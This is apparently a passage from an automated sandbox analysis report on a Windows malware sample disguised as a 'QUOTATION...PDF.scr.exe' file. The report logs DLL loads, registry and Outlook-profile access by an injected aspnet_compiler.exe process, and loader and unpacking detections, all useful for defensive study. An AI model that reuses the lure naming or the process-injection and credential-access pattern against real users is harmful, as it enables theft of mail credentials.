            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, ListDecorator.cs.Net Code: Read
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, ListDecorator.cs.Net Code: Read
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
            Yara detected Costura Assembly Loader
            Source: Yara matchFile source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880090000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6e3e8f0.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2214752450.0000022880090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: QUOTATION_NOVQTRA071244PDF.scr.exe PID: 7268, type: MEMORYSTR
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9B89FA3D pushad ; iretd 0_2_00007FFD9B89FA47
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9B897967 push ebx; retf 0_2_00007FFD9B89796A
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BAA4F9D push edi; retf 0_2_00007FFD9BAA59D6
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
